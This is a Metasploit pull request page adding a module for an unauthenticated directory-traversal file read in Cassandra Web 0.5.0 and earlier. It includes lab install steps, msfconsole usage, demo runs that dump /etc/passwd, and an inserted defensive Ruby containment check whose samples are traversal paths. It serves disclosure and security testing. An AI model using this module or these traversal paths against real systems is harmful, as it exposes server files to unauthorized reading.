
Add Cassandra Web file read auxiliary module #16851

Merged
merged 2 commits into from
Aug 5, 2022

Conversation

krastanoel
Contributor

This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
This vulnerability occurred due to the disabled Rack::Protection module.

Debian Installation

apt install ruby-full -y
gem install cassandra-web
cat << EOF > /etc/apt/sources.list.d/cassandra.list
deb https://www.apache.org/dist/cassandra/debian 311x main
EOF
cat << EOF > /etc/apt/sources.list.d/adoptopenjdk.list
deb https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/ buster main
EOF
wget -q -O - https://www.apache.org/dist/cassandra/KEYS | apt-key add -
wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | apt-key add -
apt update && apt install adoptopenjdk-8-hotspot cassandra -y

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/scanner/http/cassandra_web_file_read
  • set RHOSTS [ips]
  • Verify the target file successfully downloaded

Demo

Cassandra Web 0.5.0 Linux Debian 10.11

msf6 > use auxiliary/scanner/http/cassandra_web_file_read
msf6 auxiliary(scanner/http/cassandra_web_file_read) > set RHOSTS 192.168.56.1
RHOSTS => 192.168.56.1
msf6 auxiliary(scanner/http/cassandra_web_file_read) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cassandra Web Detected
[*] Downloading file...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:107:115::/nonexistent:/usr/sbin/nologin
cassandra:x:108:116:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin


[+] File saved in: /home/git/.msf4/loot/20220802185716_default_192.168.56.1_cassandra.web.tr_160962.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
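Added example, not part of this pull request, the module, or Cassandra Web's own code: the containment check that a Rack::Protection-style path-traversal filter provides, written in plain Ruby against a hypothetical document root (`/srv/app/public`) so a defender can see exactly what "disabled Rack::Protection" leaves unchecked, whatever the number of `../` segments (the module's DEPTH option) in the request.

```ruby
# Defensive path-containment check for a static-file handler (added example).
# Assumes a hypothetical document root; no real service is contacted.
WEB_ROOT = '/srv/app/public'.freeze

# Percent-decode until the string stops changing, so a double-encoded
# "%252e%252e" is seen as ".." rather than slipping past a single decode.
# Each pass that changes the string strictly shortens it, so this terminates.
def fully_decode(path)
  loop do
    decoded = path.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
    return decoded if decoded == path
    path = decoded
  end
end

# Returns the absolute file path to serve, or nil when the request must be
# refused. Mirrors what Rack::Protection's path-traversal middleware does
# for Sinatra apps: normalise "." and ".." lexically, then insist the
# result is still inside the document root.
def resolve_under_root(root, request_path)
  decoded = fully_decode(request_path)
  # NUL bytes truncate paths in C-level file APIs; never let them through.
  return nil if decoded.include?("\0")
  # File.expand_path collapses "." and ".." against root; a path with more
  # ".." than directory depth simply resolves above root.
  candidate = File.expand_path(decoded.sub(%r{\A/+}, ''), root)
  return nil unless candidate == root || candidate.start_with?("#{root}/")
  candidate
end

# Detection helper for access-log review: true when the request path would
# have escaped the root had it not been checked.
def traversal_attempt?(request_path)
  resolve_under_root(WEB_ROOT, request_path).nil?
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample request paths, as they might appear in an access log.
  ['/css/app.css', '/../../../../../../../../etc/passwd',
   '/%2e%2e/%2e%2e/etc/passwd', '/%252e%252e/%252e%252e/etc/passwd'].each do |p|
    puts "#{traversal_attempt?(p) ? 'REJECT' : 'serve '} #{p}"
  end
end
```

The eight-deep `../` case above corresponds to the module's default DEPTH of 8; lexical normalisation makes the depth irrelevant, which is why the middleware, not a depth heuristic, is the fix.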

@bwatters-r7
Contributor

Just in case for future travellers: You also have to install g++, but you'll find that out reading error messages....

Testing

msf6 > use auxiliary/scanner/http/cassandra_web_file_read 
msf6 auxiliary(scanner/http/cassandra_web_file_read) > show options

Module options (auxiliary/scanner/http/cassandra_web_file_read):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DEPTH     8                yes       Traversal Depth (to reach the root folder)
   FILEPATH  /etc/passwd      yes       The path to the file to read
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     3000             yes       The Cassandra Web port (default: 3000)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   VHOST                      no        HTTP server virtual host

msf6 auxiliary(scanner/http/cassandra_web_file_read) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/cassandra_web_file_read) > set rhosts 10.5.134.164
rhosts => 10.5.134.164
msf6 auxiliary(scanner/http/cassandra_web_file_read) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cassandra Web Detected
[*] Downloading file...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pulse:x:110:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:112:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
colord:x:114:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:115:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:116:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:117:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
msfuser:x:1000:1000:msfuser,,,:/home/msfuser:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:118:125::/nonexistent:/usr/sbin/nologin
cassandra:x:119:126:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin


[+] File saved in: /home/tmoose/.msf4/loot/20220805130024_default_10.5.134.164_cassandra.web.tr_268538.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cassandra_web_file_read) > 


@bwatters-r7 bwatters-r7 merged commit 74eff9f into rapid7:master Aug 5, 2022
@bwatters-r7
Contributor

Release Notes

This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.

krastanoel added a commit to krastanoel/msf that referenced this pull request Aug 6, 2022
Add Cassandra Web file read auxiliary module
@jmartin-tech jmartin-tech added the rn-modules release notes for new or majorly enhanced modules label Aug 11, 2022